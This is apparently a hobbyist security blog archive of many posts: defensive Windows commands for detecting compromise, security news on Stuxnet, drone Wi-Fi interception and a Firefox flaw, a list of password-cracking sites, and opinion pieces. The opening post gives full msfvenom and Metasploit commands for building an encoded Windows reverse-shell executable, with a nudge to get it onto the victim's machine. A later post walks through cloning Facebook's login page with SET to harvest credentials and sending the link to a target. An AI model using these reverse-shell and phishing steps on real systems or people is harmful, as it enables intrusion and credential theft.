Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7

 Windows 7 Ultimate Machine : IP Address : 192.168.1.8

 Pinging from Kali LInux Machine to Windows 7 Machine

 Pinging from Windows 7 to Kali Linux Machine

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe

Click to Enlarge

Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 

Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :

The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :

Here you have the C:\ prompt from the windows machine :-)

Computer-based Social Engineering Tools : Kali LINUX

1.   The Social-Engineering Toolkit (SET) is a product of TrustedSec. SET is a Python-driven suite of custom tools and is a menu-driven attack system that mainly concentrates on attacking the human element of security. With a wide variety of attacks available, this toolkit is an absolute must-have for penetration testing.SET comes preinstalled in Kali Linux. You can simply invoke it through the command line using the command se-toolkit:

/usr/share/set# ./set
root@Kali:/usr/share/set/# python set

Or, you can choose it through the Applications menu:

Once the user clicks on the SET toolkit, it will open with the options shown in the
following screen shot:

Website cloning

In this attack, we will mirror a web page and send that mirror page link to the target. As this is the first attack that takes place, I would suggest you to go through the options available in the different sections of the SET toolkit.Select  Social-Engineering Attacks to receive a listing of possible attacks that can be performed.

Here I start with the Website Vectors. Enter 2 to move to the next menu. For this example, on the list, we will take a look at the third option, Credential Harvester Attack Method.The following menu provides three options. We will be using one of the provided templates for this example:

 The second method will completely clone a website of your choosing and allow
you to utilize the attack vectors within the same web application that you were
attempting to clone.The IP address the user needs to enter is the IP address of Kali Linux, which can be found using the following command:

ifconfig –a

For instance, the IP address of my machine comes out as 10.0.2.15. Enter the URL to clone, for example, http://www.facebook.com, as shown in the following screenshot:

Now we have created a cloned Facebook login page that is listening on port 80. We can check the source code of the clone of the website that we have created for the phishing attack. It is stored at /usr/share/set/src/program_junk/Web Clone/~Index.html.This is the source of the web page the attacker has cloned through the SET toolkit.Navigate to the 127.0.0.1:80 (localhost port 80) URL in the browser. The phishing page is hosted on your machine's IP address.The following IP address needs to be sent to the target; this can be sent through an e-mail or can be uploaded on any web hosting site.Once the user visits the link and enters the username and password, the login credentials are redirected to our Kali Linux server that we have set up as shown in the preceding screenshot.

Finding Maximum frame size on the Network : PING makes it easy

1.   We know how to get the IP address of any website...we simply need to ping it.For example if we need to know the IP address of a website ie www.somesite****.com...then we only need to ping it....like shown in the screen shot below :

2.   So we get the IP address of the web site at www.somesite****.com as *.*.*.*....But if we need to know the maximum frame size that this can handle...what's the way out ?...ping will be able to assist us here too...we need to add some switches to it...so the next command goes like :

ping www.somesite****.com -f -l 1500 and we get this as the output :

3.   The display Packet needs to be fragmented but DF set means that the frame is too large to be on the network and needs to be fragmented.Since the -f switch is used,the packet was not sent and the ping command returned with this error.

4.   Now instead of 1500...type the same command with the attrib as 1300 like ping www.somesite****.com -f -l 1300

5.   So here we have got a bracket of size ie the maximum packet size is more than 1300 and less then 1500 bytes...so keep trying with values between 1300 and 1500 till ur reach the exact breaking point wherein the message in the ping display changes...so here the border line at which the message changes is shown in the screen shots below :

6.   So for the given www.somesite****.com ,the maximum frame size on the machine network is 1472 bytes....

7.  If you wanna try this in your network,then the 1300-1500 set that I have used may be different...so first you need to figure out those boundaries yourself!!!!!

BACKTRACK 6.0 aka KALI LINUX

1.      This will  be a surprise news for those who have were updated till Backtrack 5R3....the same team has come up with some thing more powerful thats named...KALI LINUX....:-)....and not BACKTRACK 6.0......few key points about KALI....

-    Based upon Debian Linux, instead of Ubuntu 

-    New streamlined repositories synchronize with the Debian repositories 4 times a day.

-   Another great feature introduced is that, because of Debian compliant system, it is now able to Bootstrap a Kali Installation/ISO directly from Kali repositories. This allow any user to easily build their own customization of Kali, as well as perform enterprise network installs from a local or remote repository...now start distributing your own ISO....

-   More than 300 penetration testing tools, completely free, Open source, Vast wireless device support, GPG signed packages and repos, Multi-language, Completely customizable make this distribution one of the best available masterpiece of  hacking community.

-    Once again, default root password is same “toor“, you can download Kali Linux here.

2.    My download will start tomorrow morning....will keep me busy for few days and hours...:-)

3.     Thanks http://thehackernews.com

FACEBOOK : The New Playground @ Dangerous

1.    It does not date back long in the past time corridors when I as a kid used to go to play grounds in the evening to play with my friends...meet them....fight with them...abuse them...get abused and then get back home for studies and prepare for next days school work and the cycle repeated every day...week and months.But what happens today with a typical metro kid....a school child in the bracket age of 10+ goes to Facebook to play with friends...he meets them.....abuses them at times...gets abused on the wall or vide posts.So more or less....things stand at the same place ,only the grounds have changed.First it was the actual play grounds and now it is all getting virtual.....blame it on lack of infrastructure with concrete eating much of space in metro's or lack of parental monitoring owing to their ultra busy lives.....for the new era generation...social networking sites like Facebook is the new PLAYGROUND.....the virtual one for a change!!!!

2.    So the rules remain the same....ie we have our social circle like we used to have in past...we meet vide post and comments...we like each other for something and dislike each other for some thing...here we cannot shake hands and hug each other but yess we can take grudges out of each other via so many means like hacking....cyber bullying...post hatred... cyber stalk...mobbing...sexting,internet trolling etc...the list is actually endless and the related terminology is on a phenomenal increase.So a typical new gen kid for whom Facebook kind social networking sites are the new playground to play....the proneness to the bad elements in the society remains actually higher then in past....for here it is just a matter of few compromised screenshots...hacked passwords and the kid is on way to become a victim...

3.   The recent case of Amanda Todd is indeed beginning of such sad but many in line expected incidents waiting to happen....today we may allow our kids to have a Facebook account or some social networking website account but without effectively monitoring the kid remains as prone as Amanda Todd.For this to happen the parent have to have basic IT IQ quotient to monitor to avoid any such incident.Like past when a child could be left at home assuming safe..it does not remain the same today....he has access to smartphones....he has access to tablets...internet via so many means.Even basic forensic knowledge possessed by the parents is bound to fail if the same is happening in Cloud rather then on the machine at home...

4.   Its time for the parents to equip themselves with the tools and knowledge required to monitor and watch the kids...also realizing that today's kids are more smarter in terms of grabbing the technology then ever....if you have reached reading till here...u must read the complete story here

BOY in the BROWSER attack

1.  Funny names keep propping up...and keep getting accepted too...first it was Man in the Middle attack....then Man in the Browser...and now comes Boy in the Browser attack....actually, is a trojan that reroutes its victim's web traffic information through an attacker’s proxy site.  ....a cool video here explains it in a simple language....

Resurgence of Boy-in-the-Browser Attacks

View more videos from Imperva

TOOLS & SITES OFFERING EFFECTIVE PASSWORD CRACKING

Below is a list of sites that offer tools and ways to crack passwords.The idea behind posting all these sites at one place is not to attract and promote users to try password cracking.The idea is to always remember ways and means to create and promote stronger passwords which can not be cracked.All these sites do have limitations to crack the stronger passwords and related info...

http://defaultpassword.com/

http://md5.rednoize.com/

http://ophcrack.sourceforge.net/

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

http://www.routerpasswords.com/

http://www.openwall.com/john/

http://thc.org/thc-hydra/

http://www.aircrack-ng.org/

http://www.l0phtcrack.com/

http://www.aircrack-ng.org/doku.php

http://www.solarwinds.com/products/solarwinds_free_tools/

https://www.foofus.net/error/foo.html

http://project-rainbowcrack.com/

http://www.hoobie.net/brutus/

Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future. Brutus was written originally to help me check routers etc. for default and common passwords

http://www.whatsmypass.com/

http://www.password-crackers.com/

The source of independent information about cryptosystem weakness and password recovery.

http://www.oxid.it/cain.html

Now Aerial cyber attack!!!!r u safe anyway?

"Imagine sitting in a cofee house with your laptop and chatting with your dear friend.....and then calling a friend on your phone and then paying your bill and moving out for ur regular work"

1.    Now imagine some thing u never imagined.....all what you chatted and all what you spoke on phone in the cafe house is compromised....all saved at a location unknown to you....

2.    Two security professionals proved as much at the Black Hat cybersecurity convention in Las Vegas.This has been made possible after investing a few thousand bucks, a tool box and some technical skill like these two security professionals,Richard Perkins and Mike Tassey have done.These two guys have assembled a small, unmanned airplane that is capable of some truly remarkable and potentially disastrous hacks.

3.    Perkins is a security engineer supporting the U.S. government and Tassey is a security consultant for Wall Street firms. But after work, the long-time buddies would take off their cyber attack prevention hats, put on their evil hacker thinking caps, and build their airplane in Perkins' garage.

4.    The plane can wreak lots of havoc.

- For instance, it can fly over a Starbucks (SBUX, Fortune 500) and steal the personal information of everyone connected to the coffee shop's free Wi-Fi network. It can intercept your cell phone conversations and even reroute your calls to another number. It can trace the location of specific people and follow them home.

- Perkins and Tassey spent a total of just $6,190 to build the plane. They made a point to keep it relatively cheap and to buy components that were readily available to prove that literally anyone could make one."You don't need a Ph.D. from MIT to do this," said Perkins. "There are no custom parts, it was fabricated using hand tools, and very little coding is required. All you need is dedicated people."

5.    Thanks CNN

HOW DO U FIND IF YOUR PC IS HACKED?- PART 6

FIND COMMAND

1.   Most of the commands I have discussed so far spew a lot of output on the screen, which could be hard for a human to look through to find a specific item of interest. But, Windows comes to the rescue. Users can search through the output of a command using the built-in find and findstr commands in Windows. The find command looks for simple strings, while findstr supports regular expressions, a more complex way to specify search patterns. Because the regular expressions supported by findstr go beyond the scope of this tip article, let's focus on the find command. By default, find is case sensitive - use the /i option to make it case insensitive.

2.    The find command also has the ability to count. Invoked with the /c command,it'll count the number of lines of its output that include a given string.Users often want to count the number of lines in the output of a command to determine how many processes are running, how many startup items are present  or a variety of other interesting tidbits on a machine. To count the lines of output, users could simply pipe their output through find /c /v "". This command will count (/c) the number of lines that do not have (/v) a blank line ("") in them. By counting the number of non-blank lines, the command is,in effect, counting the number of lines.

3.  Now, with the find command, users can look through the output of each of the commands I've discussed so far to find interesting tidbits. For example , to look at information every second about cmd.exe processes running on a machine, type:

C:\> wmic process list brief /every:1 | find "cmd.exe"

Or, to see which autostart programs are associated with the registry hive H KLM, run:

C:\> wmic startup list brief | find /i "hklm"

To count the number of files open on a machine on which openfiles accounting is activated, type:

C:\> openfiles /query /v | find /c /v ""

Whenever counting items in this way, remember to subtract the number of lines associated with column headers. And, as a final example, to see with one-second accuracy when TCP port 2222 starts being used on a machine, along with the process ID using the port, run:

C:\> netstat -nao 1 | find "2222"

THANKS www.amazingit.blogspot.com

HOW DO U FIND IF YOUR PC IS HACKED?- PART 5

NETSTAT COMMAND

1.  The Windows netstat command shows network activity, focusing on TCP and UDP by default. Because malware often communicates across the network, users can look for unusual and unexpected connections in the output of netstat, run as follows:

C:\> netstat –nao

2.  The -n option tells netstat to display numbers in its output, not the names of machines and protocols, and instead shows IP addresses and TCP or UDP port numbers. The -a indicates to display all connections and listening ports. The -o option tells netstat to show the processID number of each program interacting with a TCP or UDP port. If, instead of TCP and UDP, you are in interested in ICMP, netstat can be run as follows:

C:\> netstat -s -p icmp

3.   This indicates that the command will return statistics (-s) of the ICMP protocol. Although not as detailed as the TCP and UDP output, users can see if a machine is sending frequent and unexpected ICMP traffic on the network. Some backdoors and other malware communicate using the payload of ICMP Echo messages, the familiar and innocuous-looking ping packets seen on most networks periodically.

4.  Like WMIC, the netstat command also lets us run it every N seconds. But, instead of using the WMIC syntax of "/every:[N]", users simply follow their netstat invocation with a space and an integer. Thus, to list the TCP and UDP ports in use on a machine every 2 seconds, users can run:

C:\> netstat -na 2

HOW DO U FIND IF YOUR PC IS HACKED?- PART 4

OPENFILES COMMAND

1.  Many Windows administrators are unfamiliar with the powerful openfiles command built into Windows. As its name implies, this command shows all files that are opened on the box, indicating the process name interacting with each file. It's built into modern versions of Windows, from XP Pro to Vista. Like the popular ls of command for Linux and Unix, it'll show administrators all open files on the machine, giving the process name and full path for each file. Unlike lsof, however, it doesn't provide many more details, such as process ID number, user number and other information.

2.  Considering the volume of information it gathers, it's no surprise that the openfiles command is a performance hog. Thus, the accounting associated with

openfiles is off by default, meaning users can't pull any data from this command until it is turned on. This function can be activated by running:

C:\> openfiles /local on

3.  Users will need to reboot, and when the system comes back, they will be able to run the openfiles command as follows:

C:\> openfiles /query /v

4.  This command will show verbose output, which includes the user account that each process with an open file is running under. To get an idea of what malware has been installed, or what an attacker may be doing on a machine,users should look for unusual or unexpected files, especially those associated with unexpected local users on the machine.

5.   When finished with the openfiles command, its accounting functionality can be shut off and the system returned to normal performance by running the following command and rebooting:

C:\> openfiles /local off

HOW DO U FIND IF YOUR PC IS HACKED?- PART 3

1.  While WMIC is a relatively new command, let's not lose site of some useful older commands. One of my favourites is the venerable "net" command. Administrators can use this to display all kinds of useful information. For example, the "net user" command shows all user accounts defined locally on the machine. The "net localgroup" command shows groups, "net localgroup administrators" shows membership of the administrators group and the "net start" command shows running services.

2.  Attackers frequently add users to a system or put their own accounts in the administrators groups, so it's always a good idea to check the output of these commands to see if an attacker has manipulated the accounts on a machine. Also, some attackers create their own evil services on a machine, so users should be on the lookout for them.

More here.....

HOW DO U FIND IF YOUR PC IS HACKED?- PART 2

1.    WMIC stands for Windows Management Instrumentation Command-line It lets administrative users access all kinds of detailed information about a Windows machine, including detailed attributes of thousands of settings and objects. WMIC is built into Windows XP Professional, Windows 2003 and Windows Vista.

C:\> wmic process

2.    When you run this command, the output may not be an easy to understand format but the same can be formatted in several different ways, but two of the most useful for analysing a system for compromise are the "list full" option, which shows a huge amount of detail for each area of the machine a user is interested in, and the "list brief" output, which provides one line of output per report item in the list of entities, such as running processes, autostart programs and available shares. For example, we can look at a summary of every running process on a machine by running:

C:\> wmic process list brief

3.   That command will show the name, process ID and priority of each running process, as well as other less-interesting attributes.

C:\> wmic process list full

4.   This command shows all kinds of details, including the full path of the executable associated with the process and its command-line invocation. When

investigating a machine for infection, an administrator should look at each process to determine whether it has a legitimate use on the machine, researching unexpected or unknown processes using a search engine.

5.   Beyond the process alias, users could substitute startup to get a list of all auto-start programs on a machine, including programs that start when the system boots up or a user logs on, which could be defined by an auto-start registry key or folder:

C:\> wmic startup list full

6.   A lot of malware automatically runs on a machine by adding an auto-start entry alongside the legitimate ones which may belong to antivirus tools and various system tray programs. Users can look at other settings on a machine with WMIC by replacing "startup" with "QFE" (an abbreviation which stands for Quick Fix Engineering) to see the patch level of a system, with "share" to see a list of Windows file shares made available on the machine and with "useraccount" to see detailed user account settings.

7.   A handy option within WMIC is the ability to run an information-gathering command on a repeated basis by using the syntax "/every:[N]" after the rest of the WMIC command. The [N] here is an integer, indicating that WMIC should run the given command every [N] seconds. That way, users can look for changes in the settings of the system over time, allowing careful scrutiny of the output. Using this function to pull a process summary every 5 seconds, users could run:

C:\> wmic process list brief /every:1

Hitting CTRL+C will stop the cycle.

More good examples here

HOW DO U FIND IF YOUR PC IS HACKED?- PART 1

1.   We all keep ourselves worried over issues pertaining to our PC security including issues like if or not it is a zombie or if the same is already a compromised one etc. But how would you find the answer to these......call an expert and pay from your pocket? NO....the answer is MS it self...yesss!!....Microsoft Windows has a series of commands with the help of which a normal PC user would be able to find out the answers.....

2.   Following are the list of commands which would be used

WMIC Command

            - C:\> wmic process

            - C:\> wmic process list brief

- C:\> wmic process list full

- C:\> wmic startup list full

- C:\> wmic QFE list full

- C:\> wmic process list brief /every:1

The net Command

-         net localgroup

-         net localgroup administrators

Openfiles Command

          - C:\> openfiles /local on

Netstat Command

-         C:\> netstat –nao

-         C:\> netstat -s -p icmp

-         C:\> netstat -na 2

Find Command

For more details on these commands...click here....

Get Paid to Hack GOOGLE

1.    Google has made it official now vide which Google willl pay $500 and $3,133 to people who discover security vulnerabilities in its websites and online applications.......Google calls the program "experimental," but says it gives security researchers new incentives to report Web flaws directly and in real time to Google's security team thereby improving upon zero day exploit matters.

2.    This provisions  Google a chance to fix the vulnerabilities before it is exploited the way it should be. So, in order to qualify, security researchers must privately disclose new flaws to Google first before they go public with their research. Thus depending on the extent and scale of vulnerability made known to google,so will be the prize money awarded....And Google says that participants shouldn't use automated tools to search for flaws

 

Mozilla @ Prone again!!!!

1.    Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.

2.    Thanks http://www.us-cert.gov

Crack 14 Character passwords in Seconds : Objectif Sécurité

1.    There have been articles and forums on the powerful high speed GPU (video card) processors being able to easily provision cracking passwords very apace.A new technology steps here to rule the roast and allow password cracking upto 14 characters in seconds.....this is  called Objectif Sécurité ,by a Swiss security company,which uses rainbow tables on SSD drives.Seemingly it is the hard drive access time and not the processor speed that slows down cracking speed. So using SSD drives can make cracking faster, but just how fast? This technique has a phenominal capacity that could crack passwords at a rate of 300 billion passwords a second, and could decode complex password in under 5.3 seconds.

2.    A real time demo of cracking is available on line at Objectif’s free online XP hash cracker.Just visit the link and see urself by mentioning the hash in the text box.....astoundingly simple....

3. Thanks http://www.objectif-securite.ch/en/products.php

CaaS : CRIME WARE AS A SERVICE at offer now

1. Bhaigiri...Supari..khokha...and similar terms have been till date used in reference with the crime world...now come to terms like Software as a Service(SaaS), Hardware as a service(HaaS) ,Platform as a service(PaaS) etc and the list is all set to become endless with cloud computing...whats the relation here?????..it goes 2 merge these two separate worldsie CRIME & IT....the earlier terms mentioned pertain to the world of crime and the later once refer to the vast possibilities and power knocking the users....thus refers to Crimeware as a Service(CaaS)

2. The controverting side is the world of hackers & cyber criminals who seem to exploit their technical tools to great effect. However, even for newbie hackers eager to join this world don’t need to possess the required levels of technological expertise. CaaS (Crimeware-as-a-Service) pulled out of some distant Cloud can provision the necessary tools, be they Virus/Worm Creation Kits, Denial of Service (DoS) applications or more simply estabilishing a botnet.A recent research proved they can be just a mouse click away! Kits were easily located to build a variant of ‘Indra’ Malware, as well as a manifestation of Badboy , providing the user with the power to create their own version to send on to their targets.

3. Granted these are not examples of cutting-edge malware, but they do however still pose a threat to the unprepared and unsuspecting organisation. As amazing as it may seem, even today there are large organisations who permit access to sites, and allow the download of Malware Construction Kits – and even more worrying, there are still pockets of companies who do not maintain their anti-virus or patches in an up-to-dtate condition.

4. Crime is going to be a inherent part in the cyber world and the cause of worry is that unlike army and mil est in the real world...no concrete effort and source is there to resist these evil forces.We are still acting to a situtaion when need of the hour is to be more then PROACTIVE.....

5. Thanks http://www.infosecurity-magazine.com/

Stuxnet : Some more good info

1.     Recently,after i mentioned Stuxnet on Meliorate...I found some more good info and FAQs at http://www.newscientist.com/........must read....

Stuxnet : A Milestone in Malicious Code History

1. Stuxnet,the internet worm,intent of which was thought to effect Iran's nuclear programme has now taken a U Turn towards HINDUSTAN....

2. American cyber warfare expert Jeffrey Carr has assured the GoI,that China the originator of this worm which has terrorised the world since Mid 2010. Ascribing the break down of ISRO's INSAT 4B satellite a few months ago ,Carr said it is China which gained from the satellite failure. Although he re affirms that the conclusions are not definite.Invariably the effected systems are loaded with a Siemens software which have been specifically targetted to which Siemens has released a detection and removal tool.Siemens recommends installing the Microsoft patch for vulnerabilities and disallowing the use of third-party USB sticks.It is further contemplated that incorrect remotion of the worm could cause irrepairable damage.

3. Jeffrey Carr says "The satellite in question (INSAT 4B) suffered the power `glitch' in an unexplained fashion and it's failure served another state's advantage -- in this case China," he said.The connecting link between INSAT 4B and Stuxnet is that the Siemens software is used in ISRO's Liquid Propulsion Systems Centre ie S7-400 PLC and SIMATIC WinCC.Something about Stuxnet...these attack Windows systems using four zero-day attacks and targets systems using Siemens' WinCC/PCS 7 SCADA software. It is initially spread using infected USB flash drives. Once inside the system it uses the default passwords to command the software.Few intretsing things about this :

- Half a megabyte in size 

- Written in different programming languages (including C and C++) 

- Digitally signed with two authentic certificates which were stolen from two certification authorities (JMicron and Realtek) which helped it remain undetected for a relatively long period of time. - Capabable to upgrade via peer to peer.

- Eric Byres, an expert in maintaining & troubleshooting Siemens systems, expects that writing the code would have taken many man-months.

4. Stuxnet is a threat aiming a specific industrial control system such as a gas pipeline,satellite systems & power plants. The ultimate goal of Stuxnet is to sabotage the facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out of their working and identified boundaries.This worm represents the first of many milestones in malicious code history ,it is the first to exploit four 0-day vulnerabilities, compromise two digital certificates, and inject code into industrial control systems and hide the code from the operator. Whether Stuxnet will usher in a new generation of malicious code attacks towards real-world infrastructure,overshadowing the vast majority of current attacks affecting more virtual or individual assets—or if it is a once- in-a-decade occurrence remains to be seen.Stuxnet is of such great complexity requiring significant resources to develop—that few attackers will be capable of producing a similar threat, to such an extent that we would not expect masses of threats of similar in sophistication to suddenly appear. However, Stuxnet has highlighted direct-attack attempts on critical infrastructure are possible and not just theory or movie plotlines.The real-world implications of Stuxnet are beyond any threat we have seen in the past. 

5. When is India actually going to work for itself rather then performing across the globe...y is the world telling us that we are effected here...even in the case of SHADOWS IN THE CLOUD...we were told by the Shadow server foundation that our institutes have been compromised inspite of the fact that we have all it takes to take the IT world by storm...but we are all working for ourselves...and not for own country...cream is flowing out and getting outsorced..IT IS ACTUALLY SAD THAT THE WORLD KNOWS INDIA'S POTENTIAL BUT THE INDIANS DONT KNOW THIER OWN.....